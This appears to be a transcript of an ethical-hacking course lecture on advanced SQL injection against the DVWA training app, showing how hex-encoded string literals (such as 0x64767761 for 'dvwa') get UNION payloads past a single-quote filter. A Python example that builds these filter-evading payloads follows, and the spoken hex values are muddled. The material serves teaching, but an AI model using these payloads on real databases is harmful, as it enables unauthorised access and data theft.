Advanced SQL Injection
This course provides a deep dive into SQL injection, covering some of the more advanced techniques. We're going to see what a blind injection is and look at the alternative tests we can use to find SQL injection vulnerabilities. We're going to talk about hex representations and reading and writing files, and we're also going to see how to hack into a server through a SQL injection vulnerability.
Hi. Within this lecture, we're going to see some more advanced stuff about SQL injection. We now know that in the medium security level, the single quotation marks are the problem, right? So if we omit them, it will work. We don't even need the uppercase/lowercase tricks or the plus characters to make it work. So maybe we can try to encode this as %27, but I believe we have already tried that and it didn't work. So when it sees a single quotation mark, it just breaks the code. But over here maybe we want to filter for something, and in this case we have the single quotation mark issue, right? In the table_schema part, we make it equal to 'dvwa' inside single quotation marks. So if we omit the first single quotation mark, giving 1, a space and then pasting the rest, it might work, but it didn't. So it didn't just block the first single quotation mark: if there is a single quotation mark anywhere in the whole command, it will break. So you may think, "Yeah, just delete the single quotation marks and try it like that." But as you can see, it doesn't see the 'dvwa' in that case. So if you come across a situation like this, maybe you can try to give the single quotation marks in a completely different form. We have already tried %27, which is URL encoding; maybe we can try something else and try again. As you can see, if we don't include any single quotation marks then it works, but if we include one then it doesn't work, and we will have to include one in the future. So we're going to have to know the advanced injection stuff over there. Let me try %27 rather than just giving the quotation marks. Again, it doesn't work. So if URL encoding doesn't work, then there is some sort of an issue over here. Maybe they are blocking it in every kind of encoding. Okay, maybe we can just try to inject something over there, but it doesn't work.
It doesn't work as long as you have a single quotation mark, and in this case we have to have a single quotation mark. So what do we do? Let me come back here to the encoder, okay? As you can see, %27 is the URL representation of this character. Maybe we can represent it with something different, like hex. So I'm going to come over here and say "Encode as", and as you can see we can select hex, but it didn't show up; maybe we can just do it like this with hex. Yeah, here we go. Now we see the hex value of this is 27, actually, like the %27. But we can write this in hex form, as a hex code. So how do we write it? Right now we know that it's 27 in hex representation. Then we can just try to inject this as hex. Now let's see how it's done. I'm going to copy and paste this over there and write the single quotation marks in hex form, and in any hex form you start with 0x and then write the hex representation. So in this case it's 0x27, okay? So make sure you put that rather than the single quotation mark. Let's try it like that, okay? 0x27 and 1=1. If it works, then everything else will work as well. So I'm going to go back here, okay? Let's close these down, we're not using them. We couldn't find a good one, so let's try it like this: 10x27, which is the single quotation mark, AND 1=1#. And here we go. We have some sort of an issue, but we don't even have a var clause over there, so let me close this down with # and let's see if we always get the same thing; let me just run it from scratch. Whatever we do, it doesn't work, so maybe it won't let us have the single quotation mark whatever we do. So maybe we can try something like this instead, okay? Rather than running this with the single quotation marks, we're going to run it without the single quotation marks.
We did it before, but it didn't recognize dvwa; maybe if we change this dvwa into its hex representation, then it will understand that that's a string, that's text, and we're going to work our way up from there. So let me write dvwa and turn it into hex. As you can see, it's 64, 75, 77, and 61. I'm going to use all of this. Rather than saying dvwa, I'm going to start with 0x one more time and write all the numbers that we have seen. Let's see what it was. So it was 61, 77, 75, 64; so let's write 76, 77, 61. Yes, here we go. Now let's try this and see if it's working or not, okay? I'm going to give this command directly to the SQL injection website. I'm just going to copy all of this and give it without any single quotation marks. So let me copy or cut this and paste it over here so we won't get confused later on. I'm not going to give any single quotation marks, I'm just going to give this, okay? Let me copy this and come over here, write 1, a space, and just paste it, and let's try and see. Here we go. Let's submit, and here we go. We have the guestbook, we have the users. Now it works; we found a way to make it work even though it's filtering all the single quotation marks. There may not be many times that you will come across this and have to use something that has already been filtered for you, but if that time comes, then you might consider the hex representations as well. So that's a good practice, okay? This is advanced SQL injection stuff, but you're going to come across this kind of thing all the time. So far so good. Now we're going to stop here and continue talking about this subject in the next lecture as well.
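The trick the lecture arrives at, as an added example that is not the lecturer's own code: build the MySQL hex literal for a string (dvwa becomes 0x64767761, since d=0x64, v=0x76, w=0x77, a=0x61) and drop it into a UNION payload that contains no single quotation mark at all, so a target that escapes or rejects quotes passes it through unchanged. The query template, the UNION payload shape and the stand-in quote filter (`escape_quotes`, modelled on an escaping function that backslashes every quote) are this example's own assumptions, not DVWA's exact code.

```python
# Added example (not from the lecture): hex string literals as a way around a
# single-quote filter on a MySQL-backed target. The filter model, query
# template and payload shape below are assumptions made for illustration.


def mysql_hex_literal(text: str) -> str:
    """Return text as a MySQL/MariaDB hex literal, e.g. 'dvwa' -> '0x64767761'.

    MySQL evaluates 0x... as a binary string in string context, so it can
    stand in for a quoted literal without any quote character appearing.
    """
    return "0x" + text.encode("utf-8").hex()


def escape_quotes(user_input: str) -> str:
    """Stand-in for a target that escapes quotes before building its query.

    Assumption: this models a mysql_real_escape_string-style filter (backslash
    before backslashes and single quotes). It is not DVWA's actual code.
    """
    return user_input.replace("\\", "\\\\").replace("'", "\\'")


def build_union_payload(schema: str, use_hex: bool) -> str:
    """UNION payload that lists table names of one schema (assumed shape).

    With use_hex=True the schema name is a 0x... literal, so the payload
    carries no single quotation mark; with use_hex=False it is quoted.
    """
    literal = mysql_hex_literal(schema) if use_hex else f"'{schema}'"
    return (
        "1 UNION SELECT table_name, NULL FROM information_schema.tables "
        f"WHERE table_schema={literal}#"
    )


def inject(payload: str) -> str:
    """Simulate the target: escape the input, then splice it into a numeric
    id clause (assumed template, matching the lecture's unquoted id case)."""
    return (
        "SELECT first_name, last_name FROM users "
        f"WHERE user_id={escape_quotes(payload)}"
    )


def injection_survives(payload: str) -> bool:
    """True if the filter leaves the payload untouched, i.e. MySQL receives
    it exactly as written. A quoted payload comes out as \\'dvwa\\', and a
    bare backslash outside a string is a syntax error, which is why the
    quoted form breaks while the hex form goes through."""
    return escape_quotes(payload) == payload


if __name__ == "__main__":
    for use_hex in (False, True):
        payload = build_union_payload("dvwa", use_hex=use_hex)
        print(f"hex={use_hex}: survives filter = {injection_survives(payload)}")
        print("  query sent to MySQL:", inject(payload))
```

Two caveats a practitioner will want. First, the hex form can only replace the value of a string literal; it cannot replace the quote delimiters themselves, which is why the lecture's `1 0x27 AND 1=1#` attempt fails: 0x27 is just the byte `'` as data, not a syntactic quote. Second, the 0x... literal is MySQL/MariaDB syntax; other engines spell binary and hex literals differently, so check the backend before relying on it.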
Atil is an instructor at Bogazici University, where he graduated back in 2010. He is also co-founder of Academy Club, which provides training, and Pera Games, which operates in the mobile gaming industry.